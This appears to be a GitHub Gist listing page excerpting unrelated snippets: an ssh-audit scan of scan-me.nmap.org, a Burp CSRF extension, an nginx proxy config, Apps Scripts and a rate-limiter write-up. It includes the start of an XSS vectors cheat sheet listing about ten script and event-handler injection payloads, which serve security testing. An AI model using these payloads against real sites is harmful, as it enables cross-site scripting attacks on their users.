Skip to content

Instantly share code, notes, and snippets.

@mattfoster
mattfoster / ssh-audit
Created Apr 23, 2017
ssh-audit scan-me.nmap.org
View ssh-audit
% ssh-audit scan-me.nmap.org
# general
(gen) banner: SSH-2.0-OpenSSH_6.6.1
(gen) software: OpenSSH 6.6.1
(gen) compatibility: OpenSSH 6.5-6.6, Dropbear SSH 2013.62+ (some functionality from 0.52)
(gen) compression: enabled (zlib@openssh.com)
# key exchange algorithms
(kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
View csrf-session-handler.py
from burp import IBurpExtender, ISessionHandlingAction
class BurpExtender(IBurpExtender):
def registerExtenderCallbacks(self, callbacks):
callbacks.registerSessionHandlingAction(CsrfSessionHandler(callbacks.getHelpers()))
class CsrfSessionHandler(ISessionHandlingAction):
def __init__(self, helpers):
@mikhailov
mikhailov / gist:9639593
Last active Aug 16, 2021
Nginx S3 Proxy with caching
View gist:9639593
events {
worker_connections 1024;
}
http {
default_type text/html;
access_log /dev/stdout;
sendfile on;
keepalive_timeout 65;
@rushimusmaximus
rushimusmaximus / gmailToSlack.js
Last active Aug 22, 2021
Google Apps Script to post filtered Gmail messages to Slack
View gmailToSlack.js
/*
The intent of this script is for posting filtered Gmail messages to Slack.
This script could be used on its own with manually-marked messages, but it
is most useful it when combined with a Gmail filter. The script assumes that
target messages have had a specific label set on them and have been starred.
The Apps Script can then be set to run periodically.
2015/02 cmyers, rush
@jfcherng
jfcherng / st4-changelog.md
Last active Sep 5, 2021
Sublime Text 4 changelog just because it's not on the official website yet.
View st4-changelog.md
View exportjson.js
// Includes functions for exporting active sheet or all sheets as JSON object (also Python object syntax compatible).
// Tweak the makePrettyJSON_ function to customize what kind of JSON to export.
var FORMAT_ONELINE = 'One-line';
var FORMAT_MULTILINE = 'Multi-line';
var FORMAT_PRETTY = 'Pretty';
var LANGUAGE_JS = 'JavaScript';
var LANGUAGE_PYTHON = 'Python';
@kurobeats
kurobeats / xss_vectors.txt
Last active Sep 12, 2021
XSS Vectors Cheat Sheet
View xss_vectors.txt
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
View 0-rate-limiters.md

Scaling your API with rate limiters

The following are examples of the four types rate limiters discussed in the accompanying blog post. In the examples below I've used pseudocode-like Ruby, so if you're unfamiliar with Ruby you should be able to easily translate this approach to other languages. Complete examples in Ruby are also provided later in this gist.

In most cases you'll want all these examples to be classes, but I've used simple functions here to keep the code samples brief.

Request rate limiter

This uses a basic token bucket algorithm and relies on the fact that Redis scripts execute atomically. No other operations can run between fetching the count and writing the new count.